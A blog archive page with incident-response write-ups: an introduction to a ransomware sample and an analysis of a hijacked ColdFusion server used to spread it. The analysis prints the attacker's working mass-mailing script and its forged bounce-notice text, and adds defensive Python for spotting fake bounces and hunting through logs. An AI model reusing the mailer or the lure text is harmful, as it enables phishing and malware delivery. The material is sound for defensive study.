Monthly Archives: June 2014

Preying on Assumptions: Symmetric Encryption in a CryptoLocker Variant

[Image: CryptoLocker Warning]

This trojan was found on a compromised web server that was used to send mass emails with a malicious attachment. Upon execution, the malware searches all logical drives for common media and document files, appends .CRYPTOLOCKER to each file’s name and allegedly encrypts each file with a 2048-bit RSA key. It places a text file with ransom instructions in every subdirectory. It persists on the system by copying itself to a TEMP folder and adding that copy to the system autoruns. It also gives this copy a file association with the “.CRYPTOLOCKER” file extension. When it finishes this dirty work, it displays a warning (seen above) with instructions for downloading the Tor Browser to (presumably) cough up some money for the private RSA key required to decrypt the files. This is similar to the pattern we have seen in recent ransomware variants.

I initially executed this sample in a sandbox that had no network connectivity. However, the malicious process never attempts to make any network connections at any point. Regardless, it still modifies files and displays the CryptoLocker alert. I immediately found this to be unusual. My understanding is that CryptoLocker initially connects to a C&C server, which in turn generates a unique RSA key pair, one key of which is sent to the client for file encryption. This clearly isn’t the case here. I supposed that it’s possible that a public key was hard-coded into this sample, but that seems unnecessarily complicated and fragile, since we know that this was intended to be sent to many inboxes. It’s time to take a closer look at this executable.


ColdFusion Trojan Distribution

I responded to an incident that was initiated by an abuse complaint from a European ISP. Their mail server was receiving a large amount of backscatter due to emails that were initially sent from a server that I came to inspect. The sending server was a Postfix server, and there were many undelivered emails in the queue, coming from an unfamiliar domain. After closer inspection of the queue and the Postfix logs, it was clear that the emails were originating from a web server on the local network.

The compromised web server was a Windows server running IIS and ColdFusion. The HTTP ports were publicly accessible. A brief search of the server revealed a few malicious CF files, including a large web shell, and a small mailing script. In the same directory was a newly uploaded text file, containing thousands of email addresses, and a ZIP archive containing a clearly malicious executable made to look like a text file. This piece of malware will be covered in another post.

The smaller CF mailing script contains the following code:

<cfsetting RequestTimeout ="600000">
<cfloop index="id" file="C:\inetpub\wwwroot\CFIDE\fc.txt" from="1" to="31429">
<cfset sleep(100)>
<cfset msg = RandRange(185,750)>
<cfset subj = RandRange(12,21)>
<cfmail from="Mail Delivery System <postmaster@example.com>" to="#id#" subject="Delivery Status Notification (Failure)">
<cfmailparam file="C:\inetpub\wwwroot\CFIDE\Incoming Email.zip">
Incoming email(s) for <#id#> could not be delivered due to a persistent data format error.

The incoming email(s) can be read in the attachment <Incoming Email.zip>
For security purposes it has been saved in a plain text readable binary document.

Technical overview:
>>> (after RCPT To): Status Code 550.. checking .. subject length #subj# chars, message length #msg# chars..
>>> ! Message cannot be represented in 8-Bit ASCII encoding ! Return error code 521
>>> Mail transaction failed... waiting for reply from server ..
>>> Server reply: email successfully stored in plain text binary document <Incoming Email.zip>
>>> Return failure notification with original email in attachment to recipient ..

This is an automatically generated delivery status notification, please do not reply.
</cfmail>
<cfoutput>Mail sent to #id#<br></cfoutput>
</cfloop>

This code references a text file, “fc.txt”, full of thousands of email addresses, and a ZIP file called “Incoming Email.zip”. The script creates plausible-looking phishing email content, attaches the file, and then loops through the email addresses. It sends through the SMTP server associated with the server’s ColdFusion configuration.
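On the receiving side, the message this script produces can be told apart from a standards-based bounce by its MIME structure: an RFC 3464 delivery status notification is a multipart/report message with a message/delivery-status part, while the script sends a text body with a ZIP attached. The following is an added example, not code from the original post; both sample messages are constructed, and the function name, keyword list and archive extensions are assumptions chosen for illustration.

```python
import email
from email import policy
from email.message import EmailMessage

# Constructed message shaped like the script's output: text body plus a ZIP.
def forged_sample():
    m = EmailMessage()
    m["From"] = "Mail Delivery System <postmaster@example.com>"
    m["Subject"] = "Delivery Status Notification (Failure)"
    m.set_content("Incoming email(s) could not be delivered ...")
    m.add_attachment(b"placeholder", maintype="application", subtype="zip",
                     filename="Incoming Email.zip")
    return m

# Constructed bounce with the RFC 3464 layout (multipart/report).
GENUINE_RAW = """\
From: Mail Delivery System <MAILER-DAEMON@mx.example.net>
Subject: Undelivered Mail Returned to Sender
Content-Type: multipart/report; report-type=delivery-status; boundary="b2"

--b2
Content-Type: text/plain

The message could not be delivered.
--b2
Content-Type: message/delivery-status

Reporting-MTA: dns; mx.example.net

Final-Recipient: rfc822; nobody@example.com
Action: failed
Status: 5.1.1
--b2--
"""

def genuine_sample():
    return email.message_from_string(GENUINE_RAW, policy=policy.default)

def triage_bounce(msg):
    """Return (verdict, archive_names) for a parsed message."""
    text = (str(msg["From"]) + " " + str(msg["Subject"])).lower()
    parts = list(msg.walk())
    archives = [p.get_filename() for p in parts
                if (p.get_filename() or "").lower().endswith((".zip", ".rar", ".7z"))]
    if not any(k in text for k in ("mail delivery", "delivery status", "undeliver")):
        return "not-a-bounce", archives
    is_report = msg.get_content_type() == "multipart/report" and any(
        p.get_content_type() == "message/delivery-status" for p in parts)
    verdict = "dsn-structure-ok" if is_report and not archives else "suspicious-bounce"
    return verdict, archives
```

Some older mail systems send bounces that do not follow RFC 3464, so a "suspicious-bounce" verdict without an archive attachment deserves a second look rather than an automatic block.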

I searched through the HTTP logs to identify how and when these malicious pages were created and accessed. Each of the pages had only been accessed a couple of times in the recent past. They were accessed from a single IP address, which, through a PTR record, is self-identified as a Tor exit node. A continued search of the HTTP logs showed that the same IP had POSTed to the “/CFIDE/administrator” page before accessing these malicious files. It is possible that the site was compromised by exploiting a recent ColdFusion vulnerability identified by CVE-2013-0632. I don’t have the packet captures to confirm what exactly was POSTed to the server. However, this seems like the most likely explanation.
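The log search described above can be scripted so it is repeatable across servers. The following is an added example, not part of the original post: it reads IIS W3C logs and lists, per client, successful requests for .cfm pages made after that client's first POST to the administrator path. The log lines are constructed, the IPs are documentation addresses, and the placeholder_*.cfm names are hypothetical stand-ins for the uploaded files.

```python
from collections import defaultdict
from datetime import datetime

# Constructed IIS W3C log. IPs are documentation ranges; the two
# placeholder_*.cfm names stand in for the uploaded files.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2014-06-01 10:00:01 GET /index.cfm 198.51.100.7 200
2014-06-01 10:05:12 POST /CFIDE/administrator/index.cfm 203.0.113.50 200
2014-06-01 10:07:03 GET /CFIDE/placeholder_shell.cfm 203.0.113.50 200
2014-06-01 10:09:30 GET /CFIDE/placeholder_mailer.cfm 203.0.113.50 200
2014-06-01 10:11:00 GET /CFIDE/scripts/cfform.js 198.51.100.7 200
2014-06-01 10:12:00 GET /CFIDE/placeholder_shell.cfm 198.51.100.7 404
"""

def parse_w3c(text):
    """Yield one dict per request, with columns named by the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            yield row

def hunt(text, admin_prefix="/cfide/administrator"):
    """Map client IP -> [(time, uri)] for successful .cfm requests outside the
    administrator path that follow that client's first POST to it."""
    first_post, hits = {}, defaultdict(list)
    for r in sorted(parse_w3c(text), key=lambda r: r["ts"]):
        ip, uri = r["c-ip"], r["cs-uri-stem"].lower()
        if uri.startswith(admin_prefix):
            if r["cs-method"] == "POST":
                first_post.setdefault(ip, r["ts"])
        elif ip in first_post and uri.endswith(".cfm") and r["sc-status"].startswith("2"):
            hits[ip].append((r["ts"].isoformat(sep=" "), r["cs-uri-stem"]))
    return dict(hits)

if __name__ == "__main__":
    for ip, reqs in hunt(SAMPLE_LOG).items():
        print(ip, reqs)
```

Legitimate administrators also POST to the administrator path and then browse the site, so each hit is a lead to check against file creation times on disk, not a verdict.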

 Summary

  • This malware sample was distributed as an attachment to a phishing email.
  • The phishing email is designed to look like a legitimate non-delivery report.
  • The email was distributed through a short ColdFusion script that loops through a text file containing thousands of email addresses.
  • The script, email list and ZIP file were uploaded to the server by exploiting ColdFusion vulnerability CVE-2013-0632.
  • The exploit and execution of the mailing script originated from a Tor exit node, effectively anonymizing the attacker.

In the next part, I will inspect and analyze the malware payload contained within the attachment.
